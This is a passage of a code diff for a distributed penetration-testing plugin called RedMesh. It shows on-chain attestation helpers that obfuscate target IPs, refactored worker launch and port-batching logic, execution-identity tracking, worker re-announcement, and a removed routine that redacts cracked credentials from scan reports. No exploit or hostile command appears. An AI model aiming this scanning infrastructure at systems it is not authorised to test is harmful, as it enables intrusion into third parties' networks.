("00" * 10) - cid = report_cid.strip() - if len(cid) >= 10: - masked = cid[:5] + cid[-5:] - else: - masked = cid.ljust(10, "_") - safe = "".join(ch if 32 <= ord(ch) <= 126 else "_" for ch in masked)[:10] - data = safe.encode("ascii", errors="ignore") - if len(data) < 10: - data = data + (b"_" * (10 - len(data))) - return "0x" + data[:10].hex() - - @staticmethod - def _attestation_extract_host(target): - if not isinstance(target, str): - return None - target = target.strip() - if not target: - return None - if "://" in target: - parsed = urlparse(target) - if parsed.hostname: - return parsed.hostname - host = target.split("/", 1)[0] - if host.count(":") == 1 and "." in host: - host = host.split(":", 1)[0] - return host - - def _attestation_pack_ip_obfuscated(self, target) -> str: - host = self._attestation_extract_host(target) - if not host: - return "0x0000" - if ".." in host: - parts = host.split("..") - if len(parts) == 2 and all(part.isdigit() for part in parts): - first_octet = int(parts[0]) - last_octet = int(parts[1]) - if 0 <= first_octet <= 255 and 0 <= last_octet <= 255: - return f"0x{first_octet:02x}{last_octet:02x}" - try: - ip_obj = ipaddress.ip_address(host) - except Exception: - return "0x0000" - if ip_obj.version != 4: - return "0x0000" - octets = host.split(".") - first_octet = int(octets[0]) - last_octet = int(octets[-1]) - return f"0x{first_octet:02x}{last_octet:02x}" - - @staticmethod - def _attestation_pack_execution_id(job_id) -> str: - if not isinstance(job_id, str): - raise ValueError("job_id must be a string") - job_id = job_id.strip() - if len(job_id) != 8: - raise ValueError("job_id must be exactly 8 characters") - try: - data = job_id.encode("ascii") - except UnicodeEncodeError as exc: - raise ValueError("job_id must contain only ASCII characters") from exc - return "0x" + data.hex() - - - def _attestation_get_worker_eth_addresses(self, workers: dict) -> list[str]: - if not isinstance(workers, dict): - return [] - eth_addresses = [] - for node_addr in workers.keys(): - eth_addr = self.bc.node_addr_to_eth_addr(node_addr) - if not isinstance(eth_addr, str) or not eth_addr.startswith("0x"): - raise ValueError(f"Unable to convert worker node to EVM address: {node_addr}") - eth_addresses.append(eth_addr) - eth_addresses.sort() - return eth_addresses - - def _attestation_pack_node_hashes(self, workers: dict) -> str: - eth_addresses = self._attestation_get_worker_eth_addresses(workers) - if len(eth_addresses) == 0: - return "0x" + ("00" * 32) - digest = self.bc.eth_hash_message(types=["address[]"], values=[eth_addresses], as_hex=True) - if isinstance(digest, str) and digest.startswith("0x"): - return digest - return "0x" + str(digest) - - def _submit_redmesh_test_attestation(self, job_id: str, job_specs: dict, workers: dict, vulnerability_score=0, node_ips=None): - self.P(f"[ATTESTATION] Test attestation requested for job {job_id} (score={vulnerability_score})") - if not self.cfg_attestation_enabled: - self.P("[ATTESTATION] Attestation is disabled via config. Skipping.", color='y') - return None - tenant_private_key = self._attestation_get_tenant_private_key() - if tenant_private_key is None: - self.P( - "[ATTESTATION] Tenant private key is missing. " - "Expected env var 'R1EN_ATTESTATION_PRIVATE_KEY'. Skipping.", - color='y' - ) - return None - - run_mode = str(job_specs.get("run_mode", RUN_MODE_SINGLEPASS)).upper() - test_mode = 1 if run_mode == RUN_MODE_CONTINUOUS_MONITORING else 0 - node_count = len(workers) if isinstance(workers, dict) else 0 - target = job_specs.get("target") - execution_id = self._attestation_pack_execution_id(job_id) - report_cid = workers.get(self.ee_addr, {}).get("report_cid", None) #TODO: use the correct CID - node_eth_address = self.bc.eth_address - ip_obfuscated = self._attestation_pack_ip_obfuscated(target) - cid_obfuscated = self._attestation_pack_cid_obfuscated(report_cid) - - self.P( - f"[ATTESTATION] Submitting test attestation: job={job_id}, mode={'CONTINUOUS' if test_mode else 'SINGLEPASS'}, " - f"nodes={node_count}, score={vulnerability_score}, target={ip_obfuscated}, " - f"cid={cid_obfuscated}, sender={node_eth_address}" - ) - tx_hash = self.bc.submit_attestation( - function_name="submitRedmeshTestAttestation", - function_args=[ - test_mode, - node_count, - vulnerability_score, - execution_id, - ip_obfuscated, - cid_obfuscated, - ], - signature_types=["bytes32", "uint8", "uint16", "uint8", "bytes8", "bytes2", "bytes10"], - signature_values=[ - self.REDMESH_ATTESTATION_DOMAIN, - test_mode, - node_count, - vulnerability_score, - execution_id, - ip_obfuscated, - cid_obfuscated, - ], - tx_private_key=tenant_private_key, - ) - - # Obfuscate node IPs for attestation metadata - obfuscated_node_ips = [] - if node_ips: - for ip in node_ips: - obfuscated_node_ips.append(self._attestation_pack_ip_obfuscated(ip)) - - result = { - "job_id": job_id, - "tx_hash": tx_hash, - "test_mode": "C" if test_mode == 1 else "S", - "node_count": node_count, - "vulnerability_score": vulnerability_score, - "execution_id": execution_id, - "report_cid": report_cid, - "node_eth_address": node_eth_address, - "node_ips_obfuscated": obfuscated_node_ips, - } - self.P( - "Submitted RedMesh test attestation for " - f"{job_id} (tx: {tx_hash}, node: {node_eth_address}, score: {vulnerability_score})", - color='g' - ) - return result - - def _submit_redmesh_job_start_attestation(self, job_id: str, job_specs: dict, workers: dict): - self.P(f"[ATTESTATION] Job-start attestation requested for job {job_id}") - if not self.cfg_attestation_enabled: - self.P("[ATTESTATION] Attestation is disabled via config. Skipping.", color='y') - return None - tenant_private_key = self._attestation_get_tenant_private_key() - if tenant_private_key is None: - self.P( - "[ATTESTATION] Tenant private key is missing. " - "Expected env var 'R1EN_ATTESTATION_PRIVATE_KEY'. Skipping.", - color='y' - ) - return None - - run_mode = str(job_specs.get("run_mode", RUN_MODE_SINGLEPASS)).upper() - test_mode = 1 if run_mode == RUN_MODE_CONTINUOUS_MONITORING else 0 - node_count = len(workers) if isinstance(workers, dict) else 0 - target = job_specs.get("target") - execution_id = self._attestation_pack_execution_id(job_id) - node_eth_address = self.bc.eth_address - ip_obfuscated = self._attestation_pack_ip_obfuscated(target) - node_hashes = self._attestation_pack_node_hashes(workers) - - worker_addrs = list(workers.keys()) if isinstance(workers, dict) else [] - self.P( - f"[ATTESTATION] Submitting job-start attestation: job={job_id}, mode={'CONTINUOUS' if test_mode else 'SINGLEPASS'}, " - f"nodes={node_count}, target={ip_obfuscated}, node_hashes={node_hashes}, " - f"workers={worker_addrs}, sender={node_eth_address}" - ) - tx_hash = self.bc.submit_attestation( - function_name="submitRedmeshJobStartAttestation", - function_args=[ - test_mode, - node_count, - execution_id, - node_hashes, - ip_obfuscated, - ], - signature_types=["bytes32", "uint8", "uint16", "bytes8", "bytes32", "bytes2"], - signature_values=[ - self.REDMESH_ATTESTATION_DOMAIN, - test_mode, - node_count, - execution_id, - node_hashes, - ip_obfuscated, - ], - tx_private_key=tenant_private_key, - ) - - result = { - "job_id": job_id, - "tx_hash": tx_hash, - "test_mode": "C" if test_mode == 1 else "S", - "node_count": node_count, - "execution_id": execution_id, - "node_hashes": node_hashes, - "ip_obfuscated": ip_obfuscated, - "node_eth_address": node_eth_address, - } - self.P( - "Submitted RedMesh job-start attestation for " - f"{job_id} (tx: {tx_hash}, node: {node_eth_address}, node_count: {node_count})", - color='g' - ) - return result - - def __post_init(self): """ Perform warmup: reconcile existing jobs in CStore, migrate legacy keys, @@ -536,7 +378,7 @@ def __post_init(self): agg_report = self._get_aggregated_report(raw_report) our_worker["result"] = agg_report normalized_spec["workers"][self.ee_addr] = our_worker - self.chainstore_hset(hkey=self.cfg_instance_id, key=normalized_key, value=normalized_spec) + PentesterApi01Plugin._write_job_record(self, normalized_key, normalized_spec, context="warmup_repair") is_completed = all( worker.get("finished") for worker in normalized_spec.get("workers", {}).values() ) if normalized_spec.get("workers") else False @@ -566,31 +408,103 @@ def __post_init(self): - def _get_all_features(self, categs=False): + def _coerce_scan_type(self, scan_type=None): + """Normalize optional scan-type input to ScanType or None.""" + return coerce_scan_type(scan_type) + + + def _get_supported_features(self, scan_type=None, categs=False): """ - Discover all service and web test methods available to workers. + Discover executable features from registered worker classes. Parameters ---------- + scan_type : str | ScanType | None, optional + Limit discovery to one scan type when provided. categs : bool, optional If True, return a dict keyed by category; otherwise a flat list. - - Returns - ------- - dict | list - Mapping or list of method names prefixed with `_service_info_` / `_web_test_`. """ + normalized_scan_type = self._coerce_scan_type(scan_type) + worker_items = iter_scan_strategies(normalized_scan_type) + features = {} if categs else [] - PREFIXES = ["_service_info_", "_web_test_"] - for prefix in PREFIXES: - methods = [method for method in dir(PentestLocalWorker) if method.startswith(prefix)] + for _, strategy in worker_items: + worker_cls = strategy.worker_cls + worker_features = worker_cls.get_supported_features(categs=categs) if categs: - features[prefix[1:-1]] = methods + for category, methods in worker_features.items(): + bucket = features.setdefault(category, []) + for method in methods: + if method not in bucket: + bucket.append(method) else: - features.extend(methods) + for method in worker_features: + if method not in features: + features.append(method) return features + def _get_all_features(self, categs=False, scan_type=None): + """ + Discover all executable feature methods available to workers. + + Parameters + ---------- + categs : bool, optional + If True, return a dict keyed by category; otherwise a flat list. + scan_type : str | ScanType | None, optional + If provided, return features only for that scan type. + + Returns + ------- + dict | list + Mapping or list of executable feature method names. + """ + return self._get_supported_features(scan_type=scan_type, categs=categs) + + + def _get_feature_catalog(self, scan_type=None): + """Return catalog items relevant to the requested scan type.""" + normalized_scan_type = self._coerce_scan_type(scan_type) + allowed_categories = None if normalized_scan_type is None else set( + get_scan_strategy(normalized_scan_type).catalog_categories + ) + + catalog = [] + for item in FEATURE_CATALOG: + if allowed_categories and item.get("category") not in allowed_categories: + continue + catalog.append(item) + return catalog + + + def _validate_feature_catalog(self): + """Fail fast if catalog methods reference non-executable worker capabilities.""" + supported_by_type = { + scan_type: set(self._get_supported_features(scan_type=scan_type)) + for scan_type, _ in iter_scan_strategies() + } + catalog_by_type = { + ScanType.NETWORK: self._get_feature_catalog(scan_type=ScanType.NETWORK), + ScanType.WEBAPP: self._get_feature_catalog(scan_type=ScanType.WEBAPP), + } + invalid = [] + for scan_type, catalog in catalog_by_type.items(): + supported = supported_by_type[scan_type] + for item in catalog: + missing = sorted(method for method in item.get("methods", []) if method not in supported) + if missing: + invalid.append({ + "scan_type": scan_type.value, + "feature_id": item.get("id"), + "missing_methods": missing, + }) + if invalid: + raise RuntimeError( + "Invalid FEATURE_CATALOG definitions: {}".format(self.json_dumps(invalid, indent=2)) + ) + + def _normalize_job_record(self, job_key, job_spec, migrate=False): """ Normalize a job record and optionally migrate legacy entries. @@ -624,14 +538,18 @@ def _normalize_job_record(self, job_key, job_spec, migrate=False): if not isinstance(workers, dict): workers = {} normalized["workers"] = workers + try: + normalized["job_revision"] = int(normalized.get("job_revision", 0) or 0) + except (TypeError, ValueError): + normalized["job_revision"] = 0 if migrate and job_key != job_id: - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=normalized) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_key, value=None) + PentesterApi01Plugin._write_job_record(self, job_id, normalized, context="normalize_migrate") + PentesterApi01Plugin._delete_job_record(self, job_key) job_key = job_id return job_key, normalized - def _get_job_config(self, job_specs): + def _get_job_config(self, job_specs, resolve_secrets=False): """ Fetch the immutable job config from R1FS via job_config_cid. @@ -648,10 +566,13 @@ def _get_job_config(self, job_specs): cid = job_specs.get("job_config_cid") if not cid: return {} - config = self.r1fs.get_json(cid) - if config is None: + config_model = PentesterApi01Plugin._get_artifact_repository(self).get_job_config_model(job_specs) + if config_model is None: self.P(f"Failed to fetch job config from R1FS (CID: {cid})", color='r') return {} + config = config_model.to_dict() + if resolve_secrets: + return resolve_job_config_secrets(self, config, include_secret_metadata=False) return config @@ -680,6 +601,108 @@ def _get_worker_entry(self, job_id, job_spec): self.json_dumps(workers)), ) return worker_entry + + @staticmethod + def _get_worker_assignment_revision(worker_entry): + """Return a normalized per-worker assignment revision.""" + if not isinstance(worker_entry, dict): + return 1 + try: + return int(worker_entry.get("assignment_revision", 1) or 1) + except (TypeError, ValueError): + return 1 + + def _build_execution_identity(self, job_id, pass_nr, worker_addr, assignment_revision): + """Return the worker execution identity used for local idempotency.""" + return (job_id, int(pass_nr or 1), worker_addr, int(assignment_revision or 1)) + + def _get_active_execution_identity(self, job_id): + identities = getattr(self, "_active_execution_identities", None) + if isinstance(identities, dict): + return identities.get(job_id) + return None + + def _remember_execution_identity(self, job_id, execution_identity, started_at): + identities = getattr(self, "_active_execution_identities", None) + if not isinstance(identities, dict): + identities = {} + self._active_execution_identities = identities + identities[job_id] = execution_identity + + meta = getattr(self, "_execution_live_meta", None) + if not isinstance(meta, dict): + meta = {} + self._execution_live_meta = meta + _, pass_nr, _, assignment_revision = execution_identity + meta[job_id] = { + "pass_nr": pass_nr, + "assignment_revision_seen": assignment_revision, + "started_at": started_at, + "first_seen_live_at": started_at, + "last_seen_at": started_at, + } + + def _forget_execution_identity(self, job_id): + identities = getattr(self, "_active_execution_identities", None) + if isinstance(identities, dict): + identities.pop(job_id, None) + meta = getattr(self, "_execution_live_meta", None) + if isinstance(meta, dict): + meta.pop(job_id, None) + + def _publish_worker_startup_progress(self, job_id, job_specs, local_jobs, assignment_revision, started_at): + """Publish an immediate worker-owned :live startup record after launch.""" + live_repo = PentesterApi01Plugin._get_job_state_repository(self) + ee_addr = self.ee_addr + pass_nr = 1 + if isinstance(job_specs, dict): + pass_nr = job_specs.get("job_pass", 1) + + scan_type = "network" + ports_total = 0 + threads = {} + for tid, worker in (local_jobs or {}).items(): + worker_scan_type = worker.state.get("scan_type") + if worker_scan_type == "webapp": + scan_type = "webapp" + initial_ports = getattr(worker, "initial_ports", []) or [] + ports_total += len(initial_ports) + threads[tid] = { + "phase": "preflight" if worker_scan_type == "webapp" else "port_scan", + "ports_scanned": 0, + "ports_total": len(initial_ports), + "open_ports_found": [], + } + + phase = "preflight" if scan_type == "webapp" else "port_scan" + total_phases = len(GRAYBOX_PHASE_ORDER) if scan_type == "webapp" else len(PHASE_ORDER) + progress = WorkerProgress( + job_id=job_id, + worker_addr=ee_addr, + pass_nr=pass_nr, + assignment_revision_seen=assignment_revision, + progress=0.0, + phase=phase, + scan_type=scan_type, + phase_index=1, + total_phases=total_phases, + ports_scanned=0, + ports_total=ports_total, + open_ports_found=[], + completed_tests=[], + updated_at=started_at, + started_at=started_at, + first_seen_live_at=started_at, + last_seen_at=started_at, + finished=False, + threads=threads if len(threads) > 1 else None, + ) + live_repo.put_live_progress_model(progress) + self.P( + "[LIVE->CSTORE] Published worker startup " + f"job_id={job_id} worker={ee_addr} pass={pass_nr} " + f"rev={assignment_revision} phase={phase} key={job_id}:{ee_addr}" + ) def _launch_job( @@ -701,7 +724,7 @@ def _launch_job( scanner_user_agent="", ): """ - Launch local worker threads for a job by splitting the port range. + Compatibility wrapper around the extracted local launch service. Parameters ---------- @@ -738,78 +761,31 @@ def _launch_job( Raises ------ ValueError - When no ports are available or batches cannot be allocated. - """ - if excluded_features is None: - excluded_features = [] - if enabled_features is None: - enabled_features = [] - local_jobs = {} - ports = list(range(start_port, end_port + 1)) - batches = [] - if port_order == PORT_ORDER_SEQUENTIAL: - ports = sorted(ports) # redundant but explicit - else: - port_order = PORT_ORDER_SHUFFLE - random.shuffle(ports) - nr_ports = len(ports) - if nr_ports == 0: - raise ValueError("No ports available for local workers.") - nr_local_workers = max(1, min(nr_local_workers, nr_ports)) - base_chunk, remainder = divmod(nr_ports, nr_local_workers) - start = 0 - if exceptions is None: - exceptions = [] - for i in range(nr_local_workers): - chunk = base_chunk + (1 if i < remainder else 0) - end = start + chunk - batch = ports[start:end] - if batch: - batches.append(batch) - start = end - #endfor create batches - if not batches: - raise ValueError("Unable to allocate port batches to workers.") - if job_id not in self.scan_jobs: - self.scan_jobs[job_id] = {} - for i, batch in enumerate(batches): - try: - self.P("Launching {} requested by {} for target {} - {} ports. Port order {}".format( - job_id, network_worker_address, - target, len(batch), port_order - )) - batch_job = PentestLocalWorker( - owner=self, - local_id_prefix=str(i + 1), - target=target, - job_id=job_id, - initiator=network_worker_address, - exceptions=exceptions, - worker_target_ports=batch, - excluded_features=excluded_features, - enabled_features=enabled_features, - scan_min_delay=scan_min_delay, - scan_max_delay=scan_max_delay, - ics_safe_mode=ics_safe_mode, - scanner_identity=scanner_identity, - scanner_user_agent=scanner_user_agent, - ) - batch_job.start() - local_jobs[batch_job.local_worker_id] = batch_job - except Exception as exc: - self.P( - "Failed to launch batch local job for ports [{}-{}]. Port order {}: {}".format( - min(batch) if batch else "-", - max(batch) if batch else "-", - port_order, - exc - ), - color='r' - ) - #end for each batch launch a PentestLocalWorker - if not local_jobs: - raise ValueError("No local workers could be launched for the requested port range.") - return local_jobs + When the launch service cannot allocate or start local work. + """ + job_config = { + "scan_type": ScanType.NETWORK.value, + "exceptions": exceptions or [], + "port_order": port_order, + "excluded_features": excluded_features or [], + "enabled_features": enabled_features or [], + "scan_min_delay": scan_min_delay, + "scan_max_delay": scan_max_delay, + "ics_safe_mode": ics_safe_mode, + "scanner_identity": scanner_identity, + "scanner_user_agent": scanner_user_agent, + "nr_local_workers": nr_local_workers, + } + return launch_local_jobs( + self, + job_id=job_id, + target=target, + launcher=network_worker_address, + start_port=start_port, + end_port=end_port, + job_config=job_config, + nr_local_workers_override=nr_local_workers, + ) def _maybe_launch_jobs(self, nr_local_workers=None): """ @@ -856,6 +832,7 @@ def _maybe_launch_jobs(self, nr_local_workers=None): # Our worker entry was reset by launcher for next pass - clear local state self.P(f"Detected worker reset for job {job_id}, clearing local tracking for next pass") self.completed_jobs_reports.pop(job_id, None) + self._forget_execution_identity(job_id) if job_id in self.lst_completed_jobs: self.lst_completed_jobs.remove(job_id) is_closed_target = False @@ -879,215 +856,57 @@ def _maybe_launch_jobs(self, nr_local_workers=None): if end_port is None: self.P("No end port specified, defaulting to 65535.") end_port = 65535 + pass_nr = job_specs.get("job_pass", 1) + assignment_revision = PentesterApi01Plugin._get_worker_assignment_revision(worker_entry) + execution_identity = PentesterApi01Plugin._build_execution_identity( + self, job_id, pass_nr, self.ee_addr, assignment_revision + ) + active_identity = PentesterApi01Plugin._get_active_execution_identity(self, job_id) + if active_identity == execution_identity: + self.P( + f"Skipping duplicate launch for active execution identity {execution_identity}", + color='y', + ) + continue # Fetch job config from R1FS - job_config = self._get_job_config(job_specs) - exceptions = job_config.get("exceptions", []) - if not isinstance(exceptions, list): - exceptions = [] - port_order = job_config.get("port_order", self.cfg_port_order) - excluded_features = job_config.get("excluded_features", self.cfg_excluded_features) - enabled_features = job_config.get("enabled_features", []) - scan_min_delay = job_config.get("scan_min_delay", self.cfg_scan_min_rnd_delay) - scan_max_delay = job_config.get("scan_max_delay", self.cfg_scan_max_rnd_delay) - ics_safe_mode = job_config.get("ics_safe_mode", self.cfg_ics_safe_mode) - scanner_identity = job_config.get("scanner_identity", self.cfg_scanner_identity) - scanner_user_agent = job_config.get("scanner_user_agent", self.cfg_scanner_user_agent) - workers_from_spec = job_config.get("nr_local_workers") - if nr_local_workers is not None: - workers_requested = nr_local_workers - elif workers_from_spec is not None and int(workers_from_spec) > 0: - workers_requested = int(workers_from_spec) - else: - workers_requested = self.cfg_nr_local_workers - self.P("Using {} local workers for job {}".format(workers_requested, job_id)) + job_config = self._get_job_config(job_specs, resolve_secrets=True) try: - local_jobs = self._launch_job( + local_jobs = launch_local_jobs( + self, job_id=job_id, target=target, + launcher=launcher, start_port=start_port, end_port=end_port, - network_worker_address=launcher, - nr_local_workers=workers_requested, - exceptions=exceptions, - port_order=port_order, - excluded_features=excluded_features, - enabled_features=enabled_features, - scan_min_delay=scan_min_delay, - scan_max_delay=scan_max_delay, - ics_safe_mode=ics_safe_mode, - scanner_identity=scanner_identity, - scanner_user_agent=scanner_user_agent, + job_config=job_config, + nr_local_workers_override=nr_local_workers, ) except ValueError as exc: self.P(f"Skipping job {job_id}: {exc}", color='r') worker_entry["finished"] = True worker_entry["error"] = str(exc) - self.chainstore_hset(hkey=self.cfg_instance_id, key=job_id, value=job_specs) + PentesterApi01Plugin._write_job_record(self, job_id, job_specs, context="launch_error_value") + continue + except Exception as exc: + self.P(f"Skipping job {job_id}: {exc}", color='r') + worker_entry["finished"] = True + worker_entry["error"] = str(exc) + PentesterApi01Plugin._write_job_record(self, job_id, job_specs, context="launch_error_exception") continue + started_at = self.time() self.scan_jobs[job_id] = local_jobs + self._remember_execution_identity(job_id, execution_identity, started_at) + self._publish_worker_startup_progress( + job_id, + job_specs, + local_jobs, + assignment_revision=assignment_revision, + started_at=started_at, + ) #endif need to launch new job #end for each potential new job #endif it is time to check return - - - def _get_aggregated_report(self, local_jobs): - """ - Aggregate results from multiple local workers. - - Parameters - ---------- - local_jobs : dict - Mapping of worker id to result dicts. - - Returns - ------- - dict - Aggregated report with merged open ports, service info, etc. - """ - dct_aggregated_report = {} - type_or_func, field = None, None - try: - if local_jobs: - self.P(f"Aggregating reports from {len(local_jobs)} local jobs...") - for local_worker_id, local_job_status in local_jobs.items(): - aggregation_fields = PentestLocalWorker.get_worker_specific_result_fields() - for field in local_job_status: - if field not in dct_aggregated_report: - dct_aggregated_report[field] = local_job_status[field] - elif field in aggregation_fields: - type_or_func = aggregation_fields[field] - if field not in dct_aggregated_report: - field_type = type(local_job_status[field]) - dct_aggregated_report[field] = field_type() - #endif - if isinstance(dct_aggregated_report[field], list): - existing = set(dct_aggregated_report[field]) - merged = existing.union(local_job_status[field]) - try: - dct_aggregated_report[field] = sorted(merged) - except TypeError: - dct_aggregated_report[field] = list(merged) - elif isinstance(dct_aggregated_report[field], dict): - dct_aggregated_report[field] = self.merge_objects_deep( - dct_aggregated_report[field], - local_job_status[field]) - else: - _existing = dct_aggregated_report[field] - _new = local_job_status[field] - dct_aggregated_report[field] = type_or_func([_existing, _new]) - # end if aggregation type - # end if standard (one time) or aggregated fields - # for each field in this local job - # for each local job - self.P(f"Report aggregation done.") - # endif we have local jobs - except Exception as exc: - self.P("Error during report aggregation: {}:\n{}\n{}\ntype_or_func={}, field={}".format( - exc, self.trace_info(), - self.json_dumps(dct_aggregated_report, indent=2), - type_or_func, field - )) - return dct_aggregated_report - - # todo: move to helper - def merge_objects_deep(self, obj_a, obj_b): - """ - Deeply merge two objects (dicts, lists, sets). - - Parameters - ---------- - obj_a : Any - First object. - obj_b : Any - Second object. - - Returns - ------- - Any - Merged object. - """ - if isinstance(obj_a, dict) and isinstance(obj_b, dict): - merged = dict(obj_a) - for key, value_b in obj_b.items(): - if key in merged: - merged[key] = self.merge_objects_deep(merged[key], value_b) - else: - merged[key] = value_b - return merged - elif isinstance(obj_a, list) and isinstance(obj_b, list): - try: - return list(set(obj_a).union(set(obj_b))) - except TypeError: - import json as _json - seen = set() - merged = [] - for item in obj_a + obj_b: - try: - key = _json.dumps(item, sort_keys=True, default=str) - except (TypeError, ValueError): - key = id(item) - if key not in seen: - seen.add(key) - merged.append(item) - return merged - elif isinstance(obj_a, set) and isinstance(obj_b, set): - return obj_a.union(obj_b) - else: - return obj_b # Prefer obj_b in case of conflict - - - def _redact_report(self, report): - """ - Redact credentials from a report before persistence. - - Deep-copies the report and masks password values in findings and - accepted_credentials lists so that sensitive data is not written - to R1FS or CStore. - - Parameters - ---------- - report : dict - Aggregated scan report. - - Returns - ------- - dict - Redacted copy of the report. - """ - import re as _re - from copy import deepcopy - redacted = deepcopy(report) - service_info = redacted.get("service_info", {}) - for port_key, methods in service_info.items(): - if not isinstance(methods, dict): - continue - for method_key, method_data in methods.items(): - if not isinstance(method_data, dict): - continue - # Redact findings evidence - for finding in method_data.get("findings", []): - if not isinstance(finding, dict): - continue - evidence = finding.get("evidence", "") - if isinstance(evidence, str): - evidence = _re.sub( - r'(Accepted credential:\s*\S+?):(\S+)', - r'\1:***', evidence - ) - evidence = _re.sub( - r'(Accepted random creds\s*\S+?):(\S+)', - r'\1:***', evidence - ) - finding["evidence"] = evidence - # Redact accepted_credentials lists - creds = method_data.get("accepted_credentials", []) - if isinstance(creds, list): - method_data["accepted_credentials"] = [ - _re.sub(r'^(\S+?):(.+)$', r'\1:***', c) if isinstance(c, str) else c - for c in creds - ] - return redacted def _log_audit_event(self, event_type, details): @@ -1114,9 +933,223 @@ def _log_audit_event(self, event_type, details): } self.P(f"[AUDIT] {event_type}: {self.json_dumps(entry)}") self._audit_log.append(entry) - # Cap at 1000 entries to prevent memory bloat - if len(self._audit_log) > 1000: - self._audit_log = self._audit_log[-1000:] + return + + def _maybe_reannounce_worker_assignments(self): + """ + Launcher-only reconciliation pass for unseen or stale assigned workers. + + This phase only performs bounded per-worker re-announcement by bumping the + worker-specific assignment revision. Explicit terminal failure after retry + exhaustion is handled separately. + """ + now = self.time() + if now - self._last_worker_reconcile_check <= self.cfg_check_jobs_each: + return + self._last_worker_reconcile_check = now + + all_jobs = PentesterApi01Plugin._get_job_state_repository(self).list_jobs() or {} + live_payloads = PentesterApi01Plugin._get_job_state_repository(self).list_live_progress() or {} + + for job_key, raw_job_specs in all_jobs.items(): + normalized_key, job_specs = self._normalize_job_record(job_key, raw_job_specs, migrate=True) + if normalized_key is None or not isinstance(job_specs, dict): + continue + if job_specs.get("job_cid"): + continue + if job_specs.get("launcher") != self.ee_addr: + continue + if is_terminal_job_status(job_specs.get("job_status")): + continue + + reconciled_workers = reconcile_job_workers(self, job_specs, live_payloads=live_payloads, now=now) + if not reconciled_workers: + continue + + distributed_cfg = get_distributed_job_reconciliation_config(self) + startup_timeout = distributed_cfg["STARTUP_TIMEOUT"] + stale_grace = distributed_cfg["STALE_GRACE"] + max_retries = distributed_cfg["MAX_REANNOUNCE_ATTEMPTS"] + job_changed = False + stop_job = False + + for worker_addr, worker_state in reconciled_workers.items(): + if worker_state.get("finished"): + continue + + worker_status = worker_state.get("worker_state") + if worker_status not in {"unseen", "stale"}: + continue + + reannounce_count = int(worker_state.get("reannounce_count", 0) or 0) + assigned_at = worker_state.get("assigned_at") or job_specs.get("date_created") or now + last_reannounce_at = worker_state.get("last_reannounce_at") + elapsed_since_trigger = now - float(last_reannounce_at or assigned_at) + retry_reason = None + + if worker_status == "unseen" and elapsed_since_trigger >= startup_timeout: + retry_reason = "startup_timeout" + elif worker_status == "stale": + last_seen_at = worker_state.get("last_seen_at") or worker_state.get("updated_at") or assigned_at + if now - float(last_seen_at) >= stale_grace and elapsed_since_trigger >= stale_grace: + retry_reason = "stale_live" + + if not retry_reason: + continue + + target_worker = (job_specs.get("workers") or {}).get(worker_addr) + if not isinstance(target_worker, dict): + continue + + if reannounce_count >= max_retries: + target_worker["terminal_reason"] = "unreachable" + target_worker["error"] = ( + f"Worker {worker_addr} did not acknowledge assignment after " + f"{reannounce_count} re-announcements ({retry_reason})" + ) + target_worker["unreachable_at"] = now + target_worker["retry_reason"] = retry_reason + set_job_status(job_specs, JOB_STATUS_STOPPED) + PentesterApi01Plugin._emit_timeline_event( + self, + job_specs, + "worker_unreachable", + f"Worker {worker_addr} unreachable after retries", + meta={ + "worker_addr": worker_addr, + "retry_reason": retry_reason, + "reannounce_count": reannounce_count, + }, + ) + PentesterApi01Plugin._emit_timeline_event( + self, + job_specs, + "stopped", + f"Job stopped: assigned worker {worker_addr} unreachable", + ) + self.P( + "[CSTORE] Stopping job due to unreachable worker " + f"job_id={normalized_key} worker={worker_addr} " + f"reason={retry_reason} retries={reannounce_count}", + color='r', + ) + self._log_audit_event("worker_assignment_exhausted", { + "job_id": normalized_key, + "worker_addr": worker_addr, + "retry_reason": retry_reason, + "reannounce_count": reannounce_count, + }) + job_changed = True + stop_job = True + break + + current_revision = PentesterApi01Plugin._get_worker_assignment_revision(target_worker) + target_worker["assignment_revision"] = current_revision + 1 + target_worker["reannounce_count"] = reannounce_count + 1 + target_worker["last_reannounce_at"] = now + target_worker["retry_reason"] = retry_reason + target_worker.setdefault("assigned_at", assigned_at) + job_changed = True + + PentesterApi01Plugin._emit_timeline_event( + self, + job_specs, + "worker_reannounced", + f"Worker {worker_addr} assignment re-announced", + meta={ + "worker_addr": worker_addr, + "retry_reason": retry_reason, + "old_revision": current_revision, + "new_revision": target_worker["assignment_revision"], + "reannounce_count": target_worker["reannounce_count"], + }, + ) + + self.P( + "[CSTORE] Re-announcing worker assignment " + f"job_id={normalized_key} worker={worker_addr} " + f"old_rev={current_revision} new_rev={target_worker['assignment_revision']} " + f"reason={retry_reason} retries={target_worker['reannounce_count']}", + color='y', + ) + self._log_audit_event("worker_assignment_reannounced", { + "job_id": normalized_key, + "worker_addr": worker_addr, + "old_revision": current_revision, + "new_revision": target_worker["assignment_revision"], + "retry_reason": retry_reason, + "reannounce_count": target_worker["reannounce_count"], + }) + + if job_changed: + context = "worker_unreachable_stop" if stop_job else "worker_reannounce" + PentesterApi01Plugin._write_job_record(self, normalized_key, job_specs, context=context) + + def _get_job_revision(self, job_specs): + """Return a normalized revision for mutable CStore job records.""" + if not isinstance(job_specs, dict): + return 0 + try: + return int(job_specs.get("job_revision", 0) or 0) + except (TypeError, ValueError): + return 0 + + def _supports_guarded_job_writes(self): + """ + Return whether mutable RedMesh job writes have real guarded-write semantics. + + The current chainstore API only exposes plain hget/hset primitives, so + RedMesh cannot claim compare-and-swap or optimistic concurrency guarantees. + """ + return False + + def _get_job_write_guarantees(self): + """Describe the actual guarantees of mutable RedMesh job-state writes.""" + return { + "mode": "detection_only", + "guarded_writes": False, + "stale_write_detection": True, + "job_revision": True, + } + + def _write_job_record(self, job_id, job_specs, expected_revision=None, context=""): + """ + Persist mutable job state with revision bump and stale-write detection. + + This is observability only; it does not provide compare-and-swap semantics. + """ + current = PentesterApi01Plugin._get_job_state_repository(self).get_job(job_id) + current_revision = PentesterApi01Plugin._get_job_revision(self, current) + incoming_revision = PentesterApi01Plugin._get_job_revision(self, job_specs) + if expected_revision is None: + expected_revision = incoming_revision + + if isinstance(current, dict) and current_revision != expected_revision: + self.P( + f"[CSTORE] Stale write detected for job {job_id}: " + f"expected_revision={expected_revision}, current_revision={current_revision}, context={context or 'unspecified'}", + color='y' + ) + self._log_audit_event("stale_write_detected", { + "job_id": job_id, + "expected_revision": expected_revision, + "current_revision": current_revision, + "context": context or "", + "write_mode": 